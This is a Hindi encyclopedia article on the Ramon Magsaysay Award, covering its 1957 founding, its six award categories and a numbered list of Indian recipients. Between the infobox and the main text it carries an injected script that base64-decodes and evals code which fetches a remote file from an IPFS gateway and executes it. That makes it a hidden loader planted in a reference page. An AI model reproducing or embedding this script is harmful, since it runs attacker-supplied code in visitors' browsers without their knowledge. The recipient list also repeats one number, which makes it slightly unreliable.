रेमन मैग्सेसे पुरस्कार  

रेमन मैग्सेसे पुरस्कार
विवरण 'रेमन मैगसेसे पुरस्कार' एशिया के व्यक्तियों एवं संस्थाओं को उनके अपने क्षेत्र में विशेष रूप से उल्लेखनीय कार्य करने के लिये प्रदान किया जाता है। यह 'रेमन मैगसेसे पुरस्कार फाउन्डेशन' द्वारा फ़िलीपीन्स के भूतपूर्व राष्ट्रपति रमन मैगसेसे की याद में दिया जाता है।
स्थापना 1957
नामकरण इसका नामकरण फिलीपींस के राष्ट्रपति रेमन मैग्सेसे के नाम परा हुआ, जिनकी 1957 में एक विमान दुर्घटना में मृत्यु हो गयी थी।
पुरस्कार की श्रेणियाँ 1. शासकीय सेवा; 2. सार्वजनिक सेवा; 3. सामुदायिक नेतृत्व; 4. पत्रकारिता, साहित्य तथा सृजनात्मक संप्रेषण कला; 5. शांति तथा अंतर्राष्ट्रीय सद्भावना; 6. उभरता नेतृत्व
संकल्पना प्रारम्भ से ही रेमन मैग्सेसे पुरस्कार की संकल्पना 'जनता की सेवा में भावनाओं की महानता प्रदर्शित करने के लिए' की गयी थी।
अन्य जानकारी यह पुरस्कार प्रतिवर्ष मैग्सेसे जयंती पर 31 अगस्त को लोक सेवा, सामुदायिक सेवा, पत्रकारिता, साहित्य तथा सृजनात्मक कला और अंतर्राष्ट्रीय सूझबूझ के लिए प्रदान किया जाता है।
बाहरी कड़ियाँ आधिकारिक वेबसाइट

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

रेमन मैगसेसे पुरस्कार (अंग्रेज़ी: Ramon Magsaysay Award) एशिया के व्यक्तियों एवं संस्थाओं को उनके अपने क्षेत्र में विशेष रूप से उल्लेखनीय कार्य करने के लिये प्रदान किया जाता है। इसे प्राय: एशिया का नोबेल पुरस्कार भी कहा जाता है। यह रमन मैगसेसे पुरस्कार फाउन्डेशन द्वारा फ़िलीपीन्स के भूतपूर्व राष्ट्रपति रमन मैगसेसे की याद में दिया जाता है।

स्थापना

रेमन मैग्सेसे पुरस्कार की स्थापना 1957 में हुई। इसका नामकरण फिलीपींस के राष्ट्रपति रेमन मैग्सेसे के नाम परा हुआ, जिनकी 1957 में एक विमान दुर्घटना में मृत्यु हो गयी थी। वे 1950 के दशक में अपने भूमि सुधार कार्यक्रमों के माध्यम से कम्युनिस्टों की घुसपैठ को नाकाम करने के लिए विश्वविख्यात हुए। यह पुरस्कार प्रतिवर्ष मैग्सेसे जयंती पर 31 अगस्त को लोक सेवा, सामुदायिक सेवा, पत्रकारिता, साहित्य तथा सृजनात्मक कला और अंतर्राष्ट्रीय सूझबूझ के लिए प्रदान किया जाता है। यह पुरस्कार ग़ैर एशियायी संगठनों, संस्थानों को भी एशिया के हित में कार्य करने के लिए दिया जा सकता है।

पुरस्कार की संकल्पना

प्रारम्भ से ही रेमन मैग्सेसे पुरस्कार की संकल्पना 'जनता की सेवा में भावनाओं की महानता प्रदर्शित करने के लिए' की गयी थी। इस पुरस्कार की क्षेत्र सीमा के अंतर्गत पूर्वी, दक्षिण पूर्वी तथा दक्षिण एशिया तथा एशिया में रहने वाला कोई भी व्यक्ति, उसकी जाति, लिंग अथवा धर्म का भेदभाव किए बिना शामिल होते हैं। यद्यपि राष्ट्राध्यक्ष तथा शासनाध्यक्ष तथा उनके पति या पत्नी अपने कार्यकाल के समय इस पुरस्कार के पात्र नहीं होते।

पुरस्कार की श्रेणियाँ

यह पुरस्कार प्रतिवर्ष 6 श्रेणियों में दिया जाता है-

शासकीय सेवा

सरकार की किसी भी शाखा में जिनमें कार्यपालिका, न्यायिक सेवा, विधायिका अथवा सेना में उल्लेखनीय सेवा हेतु सम्मानित करने के लिए।

सार्वजनिक सेवा

किसी भी नागरिक द्वारा जनता के हित में की गयी उल्लेखनीय सेवा को समाहित करना।

सामुदायिक नेतृत्व

किसी समुदाय का नेतृत्व, सुविधाहीन लोगों को अधिकाधिक अवसर तथा बेहतर जीवन संबंधी सहायता प्रदान करने के लिए सम्मान।

पत्रकारिता, साहित्य तथा सृजनात्मक संप्रेषण कला

प्रभावी लेखन, प्रकाशन अथवा फोटोग्राफ़ी या रेडियो, टेलीविज़न, सिनेमा अथवा कला प्रदर्शन के माध्यम का जनहित में कार्यरत एक शक्ति के रूप में उपयोग।

शांति तथा अंतर्राष्ट्रीय सद्भावना

देश में तथा उनके बीच निरंतर मित्रता के विकास हेतु आधारशिला तैयार करने के लिए मित्रता, सह-अस्तित्व, शांति तथा एकजुटता को बढ़ावा देने हेतु किये गये योगदान के लिए सम्मान।

उभरता नेतृत्व

40 वर्ष अथवा इससे कम उम्र के लोगों का उनके समुदाय में सामाजिक बदलाव के लिए किए गये उल्लेखनीय कार्य के लिए सम्मान, जिनके नेतृत्व को अभी तक उनके समुदाय से बाहर पहचान नहीं मिली है।

उपलब्धि

पुरस्कार पाने वालों में में कुछ एशिया के महान् मानवतावादी, सामुदायिक नेता, बुद्धिजीवी तथा कलाकार शामिल हैं। यह इस पुरस्कार की उपलब्धि है, परंतु इसके प्राप्तकर्ताओं में ऐसे लोग भी शामिल हो सकते हैं जो किसी सार्वजनिक पहचान की अपेक्षा किए बिना चुपचाप दूसरे लोगों की मदद करते रहते हैं।

सम्मानित भारतीय

रेमन मैग्सेसे पुरस्कार से सम्मानित भारतीयों की सूची
क्रम वर्ष प्राप्तकर्ता क्षेत्र चित्र
1. 1958 विनोबा भावे सामुदायिक नेतृत्व
2. 1959 सी. डी. देशमुख शासकीय सेवा
3. 1961 अमिताभ चौधरी पत्रकारिता, साहित्य तथा सृजनात्मक संवाद कला
4. 1962 मदर टेरेसा अंतर्राष्ट्रीय सद्भाव
5. 1963 डी. एन. खुरोदे सामुदायिक नेतृत्व
6. 1963 त्रिभुवनदास कृषिभाई पटेल सामुदायिक नेतृत्व
7. 1963 वर्गीज़ कुरीयन सामुदायिक नेतृत्व
8. 1965 जयप्रकाश नारायण जनसेवा
9. 1966 कमला देवी चटोपाध्याय सामुदायिक नेतृत्व
9. 1967 सत्यजीत रे पत्रकारिता, साहित्य तथा सृजनात्मक संप्रेषण कला
10. 1971 एम. एस. स्वामीनाथन सामुदायिक नेतृत्व
11. 1974 एम.एस.सुब्बलक्ष्मी जनसेवा
12. 1975 बी. जी. वर्गीज़ पत्रकारिता, साहित्य तथा सृजनात्मक संप्रेषण कला
13. 1976 सोंभु मित्रा पत्रकारिता, साहित्य तथा सृजनात्मक संप्रेषण कला
14. 1977 इला रमेश भट्ट सामुदायिक नेतृत्व
15. 1979 रजनीकांत अरोल सामुदायिक नेतृत्व
16. 1979 माबेला अरोल सामुदायिक नेतृत्व
17. 1981 गौर किशोर घोष पत्रकारिता, साहित्य तथा सृजनात्मक संप्रेषण कला
18. 1981 प्रमोद करण सेठी सामुदायिक नेतृत्व
19. 1982 चण्डी प्रसाद भट्ट सामुदायिक नेतृत्व
20. 1982 मनीभाई देसाई जनसेवा
21. 1982 अरुण शौरी पत्रकारिता, साहित्य तथा सृजनात्मक संप्रेषण कला
22. 1984 आर. के. लक्ष्मण पत्रकारिता, साहित्य तथा सृजनात्मक संप्रेषण कला
23. 1985 मुरलीधर देवीदास आमटे (बाबा आम्टे) जनसेवा
24. 1989 लक्ष्मीचंद जैन जनसेवा
25. 1991 के. वी. सुबन्ना पत्रकारिता, साहित्य तथा सृजनात्मक संप्रेषण कला
26. 1992 पंडित रविशंकर पत्रकारिता, साहित्य तथा सृजनात्मक संप्रेषण कला
27. 1993 बानू कोयाजी जनसेवा
28. 1994 किरण बेदी शासकीय सेवा
29. 1996 टी. एन. शेषण शासकीय सेवा
30. 1996 पांडुरंग अठावले सामुदायिक नेतृत्व
31. 1997 महेश चंद्र मेहता जनसेवा
32. 1997 महाश्वेता देवी साहित्य, पत्रकारिता तथा सृजनात्मक संप्रेषण कला
33. 2000 जॉकिन अर्पुथम शांति और अंतर्राष्ट्रीय समझौता
34. 2000 अरुणा रॉय सामुदायिक नेतृत्व
35. 2001 राजेन्द्र सिंह सामुदायिक नेतृत्व
36. 2002 संदीप पांडेय आपातकालीन नेतृत्व
37. 2003 शांता सिन्हा सामुदायिक नेतृत्व
38. 2003 जेम्स माइकल लिंगदोह शासकीय सेवा
39. 2004 लक्ष्मीनारायण रामदास शांति और अंतर्राष्ट्रीय समझौता
40. 2005 वी. शांता जनसेवा
41. 2006 अरविंद केजरीवाल आपातकालीन नेतृत्व
42. 2007 पालागुम्मि साईनाथ साहित्य, पत्रकारिता तथा सृजनात्मक संप्रेषण कला
43. 2008 मंदाकिनी आम्टे आदिवासी कल्याण कार्य
44. 2008 प्रकाश आम्टे आदिवासी कल्याण कार्य
45. 2009 दीप जोशी सामाजिक कार्यकर्ता
46. 2011 नीलिमा मिश्रा सामाजिक कार्य
47. 2011 हरीश हांडे
48. 2012 कुलांदेई फ्रांसिस सामाजिक कार्य
49. 2015 संजीव चतुर्वेदी भ्रष्टाचार के विरुद्ध
50. 2015 अंशु गुप्ता सामाजिक कार्य
51. 2016 बेज़वाडा विल्सन जनसेवा
52. 2016 टी. एम. कृष्णा सामाजिक एकजुटता
53. 2018 सोनम वांगचुक समाज सेवा
54. 2018 भरत वाटवानी समाज सेवा
55. 2019 रवीश कुमार पत्रकारिता


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

बाहरी कड़ियाँ

संबंधित लेख


वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः



"https://amp.bharatdiscovery.org/w/index.php?title=रेमन_मैग्सेसे_पुरस्कार&oldid=679403" से लिया गया